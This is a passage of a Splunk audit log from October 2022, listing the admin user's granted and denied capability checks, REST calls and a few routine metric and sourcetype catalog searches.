apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 17:50:05.024, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:50:04.862, user=admin, action=search, info=cancel, search_id='1665078604.9'] Audit:[timestamp=10-06-2022 17:50:04.861, user=admin, action=search, info=granted REST: /search/jobs/1665078604.9/control] Audit:[timestamp=10-06-2022 17:50:04.778, user=admin, action=search, info=cancel, search_id='1665078604.10'] Audit:[timestamp=10-06-2022 17:50:04.777, user=admin, action=search, info=granted REST: /search/jobs/1665078604.10/control] Audit:[timestamp=10-06-2022 17:50:04.683, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:50:04.647, user=admin, action=search, info=granted REST: /search/jobs/1665078604.9/results] Audit:[timestamp=10-06-2022 17:50:04.633, user=admin, action=search, info=granted REST: /search/jobs/1665078604.10/results] Audit:[timestamp=10-06-2022 17:50:04.609, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:50:04.550, user=admin, action=rest_properties_get, info=granted REST: /static/appLogo_2x.png] Audit:[timestamp=10-06-2022 17:50:04.496, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.496, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.494, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:50:04.476, user=admin, action=list_health, info=granted object="deployment" operation=list] Audit:[timestamp=10-06-2022 17:50:04.271, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.271, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.271, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.271, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.271, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.271, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.271, user=admin, action=edit_telemetry_settings, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=list_workload_rules, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_tokens_all, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_sourcetypes, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=list_health, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_health, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_global_banner, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.270, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=list_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=fsh_manage, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_udp, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_tcp, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_splunktcp, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_scripted, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_token_http, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=restart_splunkd, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.269, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.267, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.267, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.267, user=admin, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.207, user=admin, action=embed_report, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.205, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.205, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.205, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.205, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.157, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.117, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.116, user=admin, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:50:04.116, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.085, user=admin, action=quota,search_id=1665078604.10, elapsed_ms=2, cache_size=2] Audit:[timestamp=10-06-2022 17:50:04.084, user=admin, action=search, info=granted , search_id='1665078604.10', search='| mcatalog values(metric_name) as metrics WHERE NOT metric_name="*_mrollup_*" AND ("index"="*" OR "index"="_*" ) | mvexpand metrics limit=20000', autojoin='1', buckets=0, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='', apiStartTime='Thu Oct 6 17:35:04 2022', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 17:50:04.083, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:50:04.074, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:50:04.002, user=admin, action=quota,search_id=1665078604.9, elapsed_ms=1, cache_size=2] Audit:[timestamp=10-06-2022 17:50:04.001, user=admin, action=search, info=granted , search_id='1665078604.9', search='| mcatalog values(metric_name) WHERE metric_name="fake" AND ("index"="*" OR "index"="_*") AND NOT metric_name="*_mrollup_*" BY index | fields index', autojoin='1', buckets=0, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='', apiStartTime='Wed Oct 5 17:00:00 2022', apiEndTime='Thu Oct 6 17:50:03 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 17:50:04.000, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:50:03.979, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:50:03.979, user=admin, action=edit_roles_grantable, info=denied ] Audit:[timestamp=10-06-2022 17:50:03.979, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:50:03.785, user=admin, action=edit_user, info=granted object="admin" operation=edit] Audit:[timestamp=10-06-2022 17:50:03.785, user=admin, action=edit_user, info=granted object="admin" operation=list] Audit:[timestamp=10-06-2022 17:50:03.172, user=admin, action=embed_report, info=granted ] Audit:[timestamp=10-06-2022 17:50:03.171, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:03.171, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:03.171, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:03.171, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:03.171, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 17:50:03.171, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 17:50:02.994, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:02.994, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:02.993, user=admin, action=search, info=granted REST: /search/jobs/1665078496.7] Audit:[timestamp=10-06-2022 17:50:02.208, user=admin, action=search, info=granted REST: /search/timeparser/tz] Audit:[timestamp=10-06-2022 17:50:01.794, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:01.794, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:50:01.793, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:58.798, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:58.798, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:58.797, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:56.118, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:49:55.791, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:55.791, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:55.790, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:52.796, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:52.796, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:52.795, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:49.790, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:49.790, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:49.789, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:46.789, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:46.789, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:46.788, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:46.116, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:49:43.791, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:43.791, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:43.790, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:40.789, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:40.789, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:40.788, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:37.788, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:37.788, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:37.787, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:36.113, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:49:34.652, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:34.652, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:34.652, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:31.934, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:31.934, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:31.934, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:30.079, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:30.079, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:30.078, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:28.785, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:28.785, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:28.784, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:27.889, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:27.889, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:27.888, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:27.245, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:27.245, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:27.244, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:26.770, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:26.770, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:26.769, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:26.550, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:49:26.541, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:49:26.538, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:49:26.291, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:26.291, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:26.290, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:26.114, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:49:26.112, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:26.112, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:26.111, user=admin, action=search, info=granted REST: /search/jobs/rt_md_1665078565.8] Audit:[timestamp=10-06-2022 17:49:26.057, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:49:26.029, user=admin, action=rtsearch, info=granted REST: /streams/rtsearch/0] Audit:[timestamp=10-06-2022 17:49:25.983, user=admin, action=list_health, info=granted object="deployment" operation=list] Audit:[timestamp=10-06-2022 17:49:25.973, user=admin, action=search, info=granted , search_id='rt_md_1665078565.8', search='| metadata type=sourcetypes | search totalCount > 0', autojoin='1', buckets=300, ttl=600, max_count=100000, maxtime=0, enable_lookups='1', extra_fields='*', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="RT"] Audit:[timestamp=10-06-2022 17:49:25.971, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 17:49:25.922, user=admin, action=rest_properties_get, info=granted REST: /static/appLogo_2x.png] Audit:[timestamp=10-06-2022 17:49:25.829, user=admin, action=edit_telemetry_settings, info=granted object="general" operation=list] Audit:[timestamp=10-06-2022 17:49:25.790, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 17:49:25.645, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.389, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.389, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.389, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.389, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.388, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.388, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.388, user=admin, action=edit_telemetry_settings, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.388, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.388, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.388, user=admin, action=list_workload_rules, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_tokens_all, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_sourcetypes, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=license_edit, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=list_health, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_health, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_global_banner, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=list_deployment_client, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=fsh_manage, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_search_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_dist_peer, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=list_deployment_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=list_forwarders, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_udp, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_tcp, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_splunktcp, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=list_inputs, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_scripted, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_monitor, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_token_http, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=indexes_edit, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_server, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=restart_splunkd, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_indexer_cluster, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=change_authentication, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_user, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_win_wmiconf, info=denied ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_win_regmon, info=denied ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_modinput_winprintmon, info=denied ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_modinput_perfmon, info=denied ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_modinput_winnetmon, info=denied ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_modinput_winhostmon, info=denied ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_win_eventlogs, info=denied ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_modinput_admon, info=denied ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_tcp_stream, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_upload_and_index, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.387, user=admin, action=edit_roles, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.386, user=admin, action=edit_user, info=granted object="admin" operation=edit] Audit:[timestamp=10-06-2022 17:49:25.386, user=admin, action=edit_user, info=granted object="admin" operation=list] Audit:[timestamp=10-06-2022 17:49:25.385, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.385, user=admin, action=accelerate_search, info=granted ] Audit:[timestamp=10-06-2022 17:49:25.385, user=admin, action=rest_apps_view, info=granted ] Audit:[timestamp=10-06-2022 17:49:22.600, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 17:49:22.467, user=admin, action=list_health, info=granted object="deployment" operation=list] Audit:[timestamp=10-06-2022 17:49:22.440, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] Audit:[timestamp=10-06-2022 17:49:22.440, user=admin, action=rest_properties_get, info=granted REST: /static/appIcon_2x.png] 